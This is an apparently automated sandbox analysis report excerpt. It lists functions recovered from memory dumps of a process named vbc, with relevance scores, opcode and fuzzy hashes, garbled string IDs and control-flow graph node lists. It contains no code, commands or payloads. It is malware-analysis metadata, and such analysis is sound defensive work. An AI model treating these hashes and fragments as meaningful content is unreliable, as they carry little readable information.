                                                                                                    • Opcode ID: 093b461334db1963ecca56abed46b0b6dcb56774ee50d7b2193f4c475207118e
                                                                                                    • Instruction ID: d4542fcb3c01da3f5ad3182148991da2a70e41a382abf6e49be16818b7b00115
                                                                                                    • Opcode Fuzzy Hash: 093b461334db1963ecca56abed46b0b6dcb56774ee50d7b2193f4c475207118e
                                                                                                    • Instruction Fuzzy Hash: 70522975A10514DFDB54DFA8C984E69BBB2FF89304F1581A8E509AB362CB31ECA1DF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260C8A Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TVZl
                                                                                                    • API String ID: 0-155880774
                                                                                                    • Opcode ID: 90ca2fa132458c137297cf11399d05bbcd34f76348470ee82faa8acb41ef9b4a
                                                                                                    • Instruction ID: 613ba3c2a16a10c3d937a8187442f4e785669872ffc421a6a06a5c1112f1f699
                                                                                                    • Opcode Fuzzy Hash: 90ca2fa132458c137297cf11399d05bbcd34f76348470ee82faa8acb41ef9b4a
                                                                                                    • Instruction Fuzzy Hash: 9AD14771A106289FDB14DFA8D984BADBBF1FF88304F1581A9E409EB251DB31AD95CF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054AA41 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S
                                                                                                    • API String ID: 0-425963014
                                                                                                    • Opcode ID: 80fa2d9289928ff129677ad7b276d73b5511a146b45b89205c11c903bd16f482
                                                                                                    • Instruction ID: 45cf9ed4c0d8e1bd7df275eea000a101c68b96b4aac72ea3b42afdee69fde14f
                                                                                                    • Opcode Fuzzy Hash: 80fa2d9289928ff129677ad7b276d73b5511a146b45b89205c11c903bd16f482
                                                                                                    • Instruction Fuzzy Hash: 49A16A35B042188FCB18DF64C88489DBBF5FF89318B1684A9E946DB761DB30EC02CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00548FE0 Relevance: .5, Instructions: 544COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a8c47cef194304e9bcca058ce7608e19c2921883bdf9a95e9fa976237ee2b274
                                                                                                    • Instruction ID: 9baf3b4c7d0264509eb250dab847d60b8280fc64537d1a891840efbbc8cde828
                                                                                                    • Opcode Fuzzy Hash: a8c47cef194304e9bcca058ce7608e19c2921883bdf9a95e9fa976237ee2b274
                                                                                                    • Instruction Fuzzy Hash: 23229F35B002049FDB04DFA9D895AAEBBF2BF88304F158469E906DB3A5DB71DD41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484B5AA Relevance: .2, Instructions: 238COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 318b2c9e735daddfafa4da7948a1fd28e4abb3f879231374573928672f0fbbe1
                                                                                                    • Instruction ID: f7cf6ffd4679f6f7f14e153a4ec55ca4df1ceedee9feaacbfae355fb595fb802
                                                                                                    • Opcode Fuzzy Hash: 318b2c9e735daddfafa4da7948a1fd28e4abb3f879231374573928672f0fbbe1
                                                                                                    • Instruction Fuzzy Hash: 31A18A34A001299FDB05EF69D9896ADBBF2FF88351F04C664E806E7358DB306D418F81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484B5A1 Relevance: .2, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 914e5eb5ec372d9965fd927abecf530ce1149a5e2ee9ddc11aefd3e942b9c099
                                                                                                    • Instruction ID: afec19d527b6c9c0d0b2225b6a6a5b922130154c7ca027e2316d55cad42d5740
                                                                                                    • Opcode Fuzzy Hash: 914e5eb5ec372d9965fd927abecf530ce1149a5e2ee9ddc11aefd3e942b9c099
                                                                                                    • Instruction Fuzzy Hash: 89A17A34A001299FDB05EF69D9896AD7BF2FF88351F04C664E806E7368DB306D428F91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260730 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 809a8fa8177b124c920e779906d9d8736be4787ca684a83fab083cbe66ea3c30
                                                                                                    • Instruction ID: e0269922fbaae510009fd430d1135bfdaaefdcf0416b8a28251593a897c331a1
                                                                                                    • Opcode Fuzzy Hash: 809a8fa8177b124c920e779906d9d8736be4787ca684a83fab083cbe66ea3c30
                                                                                                    • Instruction Fuzzy Hash: 2B51BE74E112099FDB04CFAAD5849AEFBF2BF88300F25D569D805AB365D730A981CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00EBEEB8 Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 595COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 ebeeb8-ebeee6 2 ebf218-ebf228 0->2 3 ebeeec-ebeefc 0->3 8 ebf22e-ebf23e 2->8 9 ebf3f0-ebf400 2->9 6 ebef02-ebef08 3->6 7 ebf044-ebf054 3->7 10 ebef0e-ebef10 6->10 11 ebefa7-ebefa9 6->11 21 ebf0b9-ebf0c9 7->21 22 ebf056-ebf065 7->22 25 ebf260-ebf270 8->25 26 ebf240-ebf25b 8->26 27 ebf406-ebf416 9->27 28 ebf4c5-ebf4d5 9->28 12 ebef2a-ebef70 10->12 13 ebef12-ebef18 10->13 15 ebefab-ebefb1 11->15 16 ebefc3-ebf00e 11->16 54 ebef3f-ebef45 12->54 55 ebef57-ebef75 12->55 19 ebef1a 13->19 20 ebef1c-ebef28 13->20 23 ebefb3 15->23 24 ebefb5-ebefc1 15->24 56 ebefd8-ebefde 16->56 57 ebeff0-ebf013 16->57 19->12 20->12 21->2 48 ebf0cf-ebf112 21->48 49 ebf07f-ebf0b4 22->49 50 ebf067-ebf06d 22->50 23->16 24->16 46 ebf272-ebf281 25->46 47 ebf2d5-ebf2e5 25->47 43 ebf5d8-ebf5df 26->43 27->28 45 ebf41c-ebf432 27->45 41 ebf4db-ebf51e 28->41 42 ebf5e7-ebf66f 28->42 131 ebf53b-ebf589 41->131 132 ebf520-ebf539 41->132 112 ebf67b-ebf6b0 K32EnumProcesses 42->112 113 ebf671-ebf679 42->113 86 ebf44c-ebf46e 45->86 87 ebf434-ebf43a 45->87 70 ebf29b-ebf2d0 46->70 71 ebf283-ebf289 46->71 47->9 73 ebf2eb-ebf32e 47->73 135 ebf133-ebf142 48->135 136 ebf114-ebf12d 48->136 49->43 52 ebf06f 50->52 53 ebf071-ebf07d 50->53 52->49 53->49 63 ebef49-ebef55 54->63 64 ebef47 54->64 101 ebef6e-ebef7a 55->101 102 ebef86-ebef89 55->102 67 ebefe2-ebefee 56->67 68 ebefe0 56->68 94 ebf009-ebf019 57->94 95 ebf023-ebf026 57->95 63->55 64->55 67->57 68->57 70->43 81 ebf28b 71->81 82 ebf28d-ebf299 71->82 148 ebf34b-ebf399 73->148 149 ebf330-ebf349 73->149 81->70 82->70 129 ebf488-ebf4c0 86->129 130 ebf470-ebf476 86->130 96 ebf43e-ebf44a 87->96 97 ebf43c 87->97 114 ebf01f-ebf021 94->114 115 ebf5e2 94->115 104 ebf028-ebf03f 95->104 96->86 97->86 101->115 118 ebef80-ebef84 101->118 106 ebef8b-ebefa2 102->106 104->43 106->43 119 ebf6b9-ebf6da 112->119 120 ebf6b2-ebf6b8 112->120 113->112 114->104 115->42 118->106 120->119 129->43 137 ebf47a-ebf486 130->137 138 ebf478 130->138 131->43 132->131 161 ebf58b-ebf5d1 132->161 150 ebf15c-ebf1c1 135->150 151 ebf144-ebf14a 135->151 136->135 162 ebf1c6-ebf213 136->162 137->129 138->129 148->43 149->148 171 ebf39e-ebf3eb 149->171 150->43 156 ebf14e-ebf15a 151->156 157 ebf14c 151->157 156->150 157->150 161->43 162->43 171->43
                                                                                                    APIs
                                                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 00EBF6A3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.605364405.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_eb0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumProcesses
                                                                                                    • String ID: hHP$hHP$hHP$hHP$hHP
                                                                                                    • API String ID: 84517404-1073775151
                                                                                                    • Opcode ID: bf5783c5120c0708b62f46606e6dcc0f9692f5bce1737a0d8cb52d25894957f8
                                                                                                    • Instruction ID: 47293c1a556b60e703d1a0c4599960634c742f2ab6c9876a807d52dd03655bd1
                                                                                                    • Opcode Fuzzy Hash: bf5783c5120c0708b62f46606e6dcc0f9692f5bce1737a0d8cb52d25894957f8
                                                                                                    • Instruction Fuzzy Hash: 3922C070B001159FCB25EB68D8919FE7ABAABC9304B25C13AE506F7395DF349C018BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FB010 Relevance: 6.6, Strings: 5, Instructions: 321COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,_N$,_N$,_N$,_N$,_N
                                                                                                    • API String ID: 0-1312344566
                                                                                                    • Opcode ID: f474f2dea034eeec6e964f273de822a5eabf8dda7eb7e62e19dfbd35eccc5ac7
                                                                                                    • Instruction ID: bd8a0def3f67af59a6981f1d1d1eaf495e8882bad1541d56a829bf95ae052538
                                                                                                    • Opcode Fuzzy Hash: f474f2dea034eeec6e964f273de822a5eabf8dda7eb7e62e19dfbd35eccc5ac7
                                                                                                    • Instruction Fuzzy Hash: 47C1C4347001089FDB05FBA5D4919BE77B7EBCA304B10816BE602A7396CF395C029BDA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00547A98 Relevance: 6.4, Strings: 5, Instructions: 180COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 652 547a98-547ab3 654 547ba7-547bcb 652->654 655 547ab9-547abb 652->655 657 547bd2-547bf6 654->657 656 547ac1-547acd 655->656 655->657 661 547ae1-547af1 656->661 662 547acf-547adb 656->662 669 547bfd-547c21 657->669 661->669 670 547af7-547b05 661->670 662->661 662->669 673 547c28-547cad call 544bc8 669->673 670->673 674 547b0b-547b10 670->674 698 547cb2-547cc0 call 547458 673->698 707 547b12 call 547ca0 674->707 708 547b12 call 547a98 674->708 676 547b18-547b61 691 547b84-547ba4 call 545e00 676->691 692 547b63-547b7c 676->692 692->691 703 547cc2-547cc8 698->703 704 547cd8-547cda 698->704 705 547ccc-547cce 703->705 706 547cca 703->706 705->704 706->704 707->676 708->676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S$<,S
                                                                                                    • API String ID: 0-3172025524
                                                                                                    • Opcode ID: cedc4492357d5203e24a73072f892cc7c9993ca661e8983767b642dcbecac870
                                                                                                    • Instruction ID: 98cebf7379b130116e274da2ff108ac4928c27b0049bbcf9f7cf004150f72dbd
                                                                                                    • Opcode Fuzzy Hash: cedc4492357d5203e24a73072f892cc7c9993ca661e8983767b642dcbecac870
                                                                                                    • Instruction Fuzzy Hash: 26518E30B046088FD728EB75C8549AE7BE2EFD9308B11446DE906DB3A1DF35ED068B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FB000 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,_N$,_N$,_N$,_N
                                                                                                    • API String ID: 0-949176197
                                                                                                    • Opcode ID: 1d472eed951666e447688a6b079c520fbfc8531fe9a9b923bf8dfb060ef918b9
                                                                                                    • Instruction ID: 21ca91c770d3fd396f450d1eb801ec364a37710cf63c00f30c6f73a3458791a1
                                                                                                    • Opcode Fuzzy Hash: 1d472eed951666e447688a6b079c520fbfc8531fe9a9b923bf8dfb060ef918b9
                                                                                                    • Instruction Fuzzy Hash: 42A16234B005089FDB05FBA5D4959BE77B7EBC9304B10C12AE602A7399CF795C029BDA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054A090 Relevance: 5.2, Strings: 4, Instructions: 187COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1010 54a090-54a0d1 1013 54a1c6-54a1ea 1010->1013 1014 54a0d7-54a0db 1010->1014 1024 54a1f1-54a215 1013->1024 1015 54a0dd-54a0e9 1014->1015 1016 54a0ef-54a0f3 1014->1016 1015->1016 1015->1024 1018 54a21c-54a240 1016->1018 1019 54a0f9-54a110 1016->1019 1037 54a247-54a29a 1018->1037 1029 54a124-54a128 1019->1029 1030 54a112-54a11e 1019->1030 1024->1018 1032 54a15d-54a176 call 547380 1029->1032 1033 54a12a-54a14c 1029->1033 1030->1029 1030->1037 1044 54a19f-54a1c3 1032->1044 1045 54a178-54a19c 1032->1045 1033->1032 1050 54a14e-54a151 1033->1050 1055 54a2d2-54a2f6 1037->1055 1056 54a29c-54a2bc 1037->1056 1052 54a15a 1050->1052 1052->1032 1063 54a2fd-54a361 1055->1063 1056->1063 1064 54a2be-54a2cf 1056->1064 1072 54a365-54a367 1063->1072 1073 54a363 1063->1073 1074 54a379 1072->1074 1075 54a369-54a377 1072->1075 1073->1072 1076 54a37b-54a37d 1074->1076 1075->1076 1077 54a737-54a743 1076->1077 1078 54a383-54a38f 1076->1078 1083 54a745-54a74e 1077->1083 1084 54a750-54a758 1077->1084 1081 54a3a1-54a3b0 call 549fb0 1078->1081 1082 54a391-54a39c 1078->1082 1090 54a3b2 1081->1090 1091 54a3b9-54a3bf 1081->1091 1087 54a75f-54a766 1082->1087 1083->1087 1084->1087 1090->1077 1090->1091 1092 54a4f5-54a52b 1090->1092 1093 54a6d6-54a6f0 1090->1093 1094 54a6f6-54a735 1090->1094 1095 54a530-54a565 1090->1095 1096 54a452-54a47a 1090->1096 1097 54a6f2-54a6f4 1090->1097 1098 54a61d-54a61f 1090->1098 1099 54a65f-54a694 1090->1099 1100 54a47f-54a4b4 1090->1100 1101 54a699-54a6d1 1090->1101 1102 54a4b9-54a4f0 1090->1102 1103 54a624-54a65a 1090->1103 1104 54a5a7-54a5dc 1090->1104 1105 54a5e1-54a618 1090->1105 1106 54a423-54a427 1090->1106 1107 54a3cc-54a3e4 1090->1107 1108 54a3e9-54a41e 1090->1108 1109 54a56a-54a5a2 1090->1109 1091->1077 1110 54a3c5 1091->1110 1092->1087 1093->1087 1094->1087 1095->1087 1096->1087 1097->1087 1098->1087 1099->1087 1100->1087 1101->1087 1102->1087 1103->1087 1104->1087 1105->1087 1111 54a767-54a7a6 1106->1111 1112 54a42d-54a43d 1106->1112 1107->1087 1108->1087 1109->1087 1110->1077 1110->1093 1110->1094 1110->1097 1110->1107 1137 54a7ad-54a7f3 1111->1137 1136 54a443-54a44d 1112->1136 1112->1137 1136->1087
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S$<,S
                                                                                                    • API String ID: 0-4277764744
                                                                                                    • Opcode ID: f44474c1e5f9675767aca6a5d3a9a3b3e89a4ed55c635436965a68ef372e285f
                                                                                                    • Instruction ID: 745ce80ea7980562c4509ce5197b44bae50aeebb46d9afc9b9c476bb7786cc8d
                                                                                                    • Opcode Fuzzy Hash: f44474c1e5f9675767aca6a5d3a9a3b3e89a4ed55c635436965a68ef372e285f
                                                                                                    • Instruction Fuzzy Hash: 0861F0313046449FDB59DF24D854AAE3BA2EF85308F158469E906DB3A2DB35DC06CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F96E0 Relevance: 4.0, Strings: 3, Instructions: 226COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1367 4f96e0-4f9730 1376 4f9708-4f970a 1367->1376 1377 4f9880-4f9893 1367->1377 1378 4f970c-4f9719 1376->1378 1379 4f9732-4f9736 1376->1379 1392 4f989a 1377->1392 1381 4f974f-4f9753 1379->1381 1382 4f9738-4f9747 1379->1382 1383 4f976a-4f976c 1381->1383 1384 4f9755-4f9762 1381->1384 1382->1381 1385 4f976f-4f9779 1383->1385 1384->1383 1389 4f977b-4f9780 1385->1389 1390 4f9782 1385->1390 1391 4f9787-4f979f 1389->1391 1390->1391 1391->1392 1395 4f97a5-4f97d4 call 4f9968 1391->1395 1394 4f98a3-4f98c0 1392->1394 1400 4f98c2-4f98d8 1394->1400 1399 4f97da-4f97e1 1395->1399 1401 4f97fc-4f9800 1399->1401 1402 4f97e3-4f97e5 1399->1402 1411 4f98da-4f98dd 1400->1411 1405 4f9832-4f9864 1401->1405 1406 4f9802-4f9817 1401->1406 1402->1401 1404 4f97e7-4f97fb 1402->1404 1405->1385 1421 4f986a-4f987f 1405->1421 1415 4f981d 1406->1415 1416 4f9819-4f981b 1406->1416 1413 4f98df-4f990c call 4f95c0 1411->1413 1414 4f9915-4f9963 1411->1414 1413->1411 1428 4f9907-4f9914 1413->1428 1419 4f9820-4f982f 1415->1419 1416->1419 1419->1405
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 48Zl$\ [l$*[l
                                                                                                    • API String ID: 0-1941589167
                                                                                                    • Opcode ID: de86582a1da0d5c390bb98d1c487181920a01aeb79d6fcc257ffaabce5326978
                                                                                                    • Instruction ID: ec77412463be7ad51767a26d662484b6350d8fc36e9ef9978542a302e6143599
                                                                                                    • Opcode Fuzzy Hash: de86582a1da0d5c390bb98d1c487181920a01aeb79d6fcc257ffaabce5326978
                                                                                                    • Instruction Fuzzy Hash: F8710331B04208DFCB14EFA5C891BBFB7B6EB85304F20452ED65697781CB386D068B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543E37 Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1461 543e37-543e39 1462 543df9-543e36 1461->1462 1463 543e3b-543e57 1461->1463 1464 543f70-543f94 1463->1464 1465 543e5d-543e69 1463->1465 1471 543f9b-543ffc 1464->1471 1470 543e6f-543e77 1465->1470 1465->1471 1478 543e82-543e86 1470->1478 1480 543e88-543e97 1478->1480 1481 543e99-543eb0 1478->1481 1480->1481 1489 543eb2 1481->1489 1490 543eba-543ebc 1481->1490 1492 543eb4-543eb8 1489->1492 1493 543ebe 1489->1493 1494 543ec3-543ed0 1490->1494 1492->1490 1492->1493 1493->1494 1495 543ed2-543ed6 1494->1495 1496 543ed8-543edb 1494->1496 1497 543ede-543ee6 1495->1497 1496->1497 1498 543ef2 1497->1498 1499 543ee8-543ef0 1497->1499 1500 543ef6-543f55 1498->1500 1499->1500 1503 543f57-543f61 1500->1503 1504 543f69-543f6d 1500->1504 1503->1504
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$<,S$<,S
                                                                                                    • API String ID: 0-2199480955
                                                                                                    • Opcode ID: 78f751cd1af3bb7e6a0ae53979853080ff88ffa8d8ae7d471f89569df452c2e9
                                                                                                    • Instruction ID: 588973c6afc6ec2efdbd1b6cbe8fcef58002c00514af97dbf4fdbf275edddfa5
                                                                                                    • Opcode Fuzzy Hash: 78f751cd1af3bb7e6a0ae53979853080ff88ffa8d8ae7d471f89569df452c2e9
                                                                                                    • Instruction Fuzzy Hash: CF51EF307087408FD325DF36C45469A7BF2EF85318F158A6EE196CB6A1DB34DE098B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054BB12 Relevance: 3.0, Strings: 2, Instructions: 478COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: T$T
                                                                                                    • API String ID: 0-152709941
                                                                                                    • Opcode ID: 69538fdce18464b5eef4cf097a14d728e854fa8f7884071a18cde5ec70ee9074
                                                                                                    • Instruction ID: 5e5af9c45c012f748503df4c7b9f140c454b3a3d5b048bca8661c1fe0a78d98e
                                                                                                    • Opcode Fuzzy Hash: 69538fdce18464b5eef4cf097a14d728e854fa8f7884071a18cde5ec70ee9074
                                                                                                    • Instruction Fuzzy Hash: C402CF706042429FE7149F29C854ABE7FE2FF94304F144469E996CB392DB35CD4ACB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362982 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 48Zl$48Zl
                                                                                                    • API String ID: 0-1582268119
                                                                                                    • Opcode ID: 671dc1a7d77daf34fc04c06e6dfc91e2ca73544ff0b6763e5847f03a087d3d38
                                                                                                    • Instruction ID: c7309e34701a3606b18021548797d03bdf6d4bab72a844ceb5126e6278ecb14b
                                                                                                    • Opcode Fuzzy Hash: 671dc1a7d77daf34fc04c06e6dfc91e2ca73544ff0b6763e5847f03a087d3d38
                                                                                                    • Instruction Fuzzy Hash: 85D13930A09391CFC315DFA9C85559FBBF2EF86204B1AC4AED4969BA55C730EC42CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FEAB8 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HVK$HVK
                                                                                                    • API String ID: 0-1128980489
                                                                                                    • Opcode ID: 9817f1730a56e7af1fa3fce659eecdd193e8ed2c6dab5387bbc2f33b7e7d726e
                                                                                                    • Instruction ID: 6d45dcada50c753be695666fe2011e5d8feeffcb9be1781dc44a9b2d51ba6dee
                                                                                                    • Opcode Fuzzy Hash: 9817f1730a56e7af1fa3fce659eecdd193e8ed2c6dab5387bbc2f33b7e7d726e
                                                                                                    • Instruction Fuzzy Hash: F9C1A730B00208DFDB15EB95C495B7E77B6AF84304F24813AE602AB3A5CF795C46DB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FDAD0 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: hHP$@P
                                                                                                    • API String ID: 0-4246945197
                                                                                                    • Opcode ID: cba3e25b4dc111ae148fae6cd761d2e5119b1eb558dd86dc55dbad7fc8b24f9d
                                                                                                    • Instruction ID: a2e3324a473118a20376c78c15a668a9db67c8a024d5c06d043a01e8da597959
                                                                                                    • Opcode Fuzzy Hash: cba3e25b4dc111ae148fae6cd761d2e5119b1eb558dd86dc55dbad7fc8b24f9d
                                                                                                    • Instruction Fuzzy Hash: FEB17C74B00509CFC709FFA8D59597E77B2EB99300B218169E602DB399CB34AD06CBD6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543CC8 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S$P+F
                                                                                                    • API String ID: 0-1464954651
                                                                                                    • Opcode ID: f559c7121f4f966e0cbee4ec46a985392e9c2ee264929e8fd3c3f1c07ae3c58f
